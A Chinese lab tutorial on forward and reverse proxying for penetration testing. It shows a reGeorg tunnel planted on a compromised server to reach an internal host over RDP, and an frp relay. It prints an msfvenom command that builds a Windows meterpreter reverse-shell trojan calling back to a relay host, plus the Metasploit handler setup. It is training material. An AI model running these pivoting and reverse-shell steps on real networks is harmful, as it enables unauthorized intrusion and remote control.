演示正向代理与反向代理

流量代理

正向代理

正向代理是客户端和其他所有服务器(重点:所有)的代理者

1、演示正向代理与反向代理

在这里插入图片描述
在这里插入图片描述

socks5协议

和http协议一样,都是应用层协议

目的:提供代理服务

作用:socks5客户端直接把想访问的ip发送给socks5服务器,当数据包到socks5服务器,socks5服务器会尝试发包到想访问的ip

正向代理实验

搭建实验环境

准备:

  • win11 nat一个网卡

  • server2016(失陷主机) nat vmnat1仅主机(配置静态ip 10.1.1.1)两个网卡

  • 内网主机(内网主机) 仅主机一个网卡(配置静态ip 10.1.1.2)

注意:phpstudy版本要调低一点,否则可能出问题

win11可以访问失陷主机的phpinfo.php

在这里插入图片描述

win11不可以访问内网主机的phpinfo.php

在这里插入图片描述

失陷主机可以访问内网主机的phpinfo.php

在这里插入图片描述

win11:

安装一个proxy
在这里插入图片描述

将reGeorg-master.zip压缩包放到win11,并且解压
在这里插入图片描述

在失陷主机server2016的web根目录下放一个文件

在这里插入图片描述

访问这个php文件,看到这个提示,说明成功

在这里插入图片描述

win11里搭建socks5服务

python2 .\reGeorgSocksProxy.py -p 8080 -u http://10.4.7.138/tunnel.nosocket.php

-u 会把本地socks5流量 发送给后面追加的链接

在这里插入图片描述

给proxy做配置

在这里插入图片描述

挂上代理

在这里插入图片描述

访问10.1.1.2可以访问了

在这里插入图片描述

安装客户端

在这里插入图片描述

作用:截取整个主机的所有可执行文件

给内网主机开启3389远程服务

在这里插入图片描述

使用攻击机远程连接内网主机

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

远程连接内网主机10.1.1.2
在这里插入图片描述
在这里插入图片描述

成功连接到内网主机

在这里插入图片描述

查看Proxifier

在这里插入图片描述

反向代理

反向代理是客户端和所要代理的服务器之间的代理。

在这里插入图片描述
在这里插入图片描述

流量转发工具

需要放在拿到shell的服务器上可使用

1.lcx

端口流量转发,不具备完整的proxy代理功能

2.msf

3.cobalt Strike

4.earthworm

5.reGeorg

本地的客户端可以使用

*windows*

1.proxifier

2.SocksCap64

linux

1.proxychains4

vim /etc/proxychains4.conf

反向代理实验

在这里插入图片描述

frp客户端向服务器发起连接请求,连接成功以后,服务器会把自己收到的流量转发给客户端

frp客户端和服务器都有自己的配置文件,服务器哪个端口接受的流量发送给客户端的哪个端口,都必须在配置文件写流量

搭建实验环境

  • kali nat模式

  • dmz主机(win7) 桥接模式

  • 真实机 服务端

真实机 配置frp服务端

frp_0.36.2_windows_amd64.zip 解压到桌面

!

frp_0.36.2_windows_amd64文件夹文件含义

在这里插入图片描述

客户端配置文件内容及含义

在这里插入图片描述

真实机 开启frp服务端
.\frps.exe -c frps.ini

在这里插入图片描述

回车一定要回车一下!!!!

在这里插入图片描述

kali 客户端 解压缩到桌面

tar xf frp_0.36.2_linux_amd64.tar.gz

在这里插入图片描述

┌──(kali㉿kali)-[~/Desktop]
└─$ cd frp_0.36.2_linux_amd64 
                                                                   
┌──(kali㉿kali)-[~/Desktop/frp_0.36.2_linux_amd64]
└─$ ls
frpc           frpc.ini  frps_full.ini  LICENSE
frpc_full.ini  frps      frps.ini       systemd

在这里插入图片描述

修改客户端的配置文件
[common]
server_addr = 10.9.47.193
server_port = 7000

[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 6789
remote_port = 6789

在这里插入图片描述

local_port: 生成木马时木马要连接什么端口

remote_port:当远程主机的哪个端口接受流量时发送给本机

当10.9.47.193的6789端口收到流量时会发送给kali主机的6789端口

开启客户端服务
sudo ./frpc -c frpc.ini

在这里插入图片描述

真实机(服务端)显示连接成功

在这里插入图片描述

kali(客户端)生成一个木马

sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.9.47.193 LPORT=6789 -f exe -o test.exe

-p 指定的使用的payload

LHOST 连接哪个主机

LPORT 连接哪个端口

在这里插入图片描述

将生成的木马复制到dmz主机

将kaili的6789端口打开

sudo msfconsole

在这里插入图片描述

用于metasploit接收会话的模块

use exploit/multi/handler

在这里插入图片描述

设置payload

set payload windows/meterpreter/reverse_tcp

监听本地主机

set LHOST 127.0.0.1

监听哪个端口号

set LPORT 6789

跑一下

run

在这里插入图片描述

在这里插入图片描述

双击exe ,在kali监听的6789端口 执行命令,发现已经反弹到了win7里

在这里插入图片描述

  • 20
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值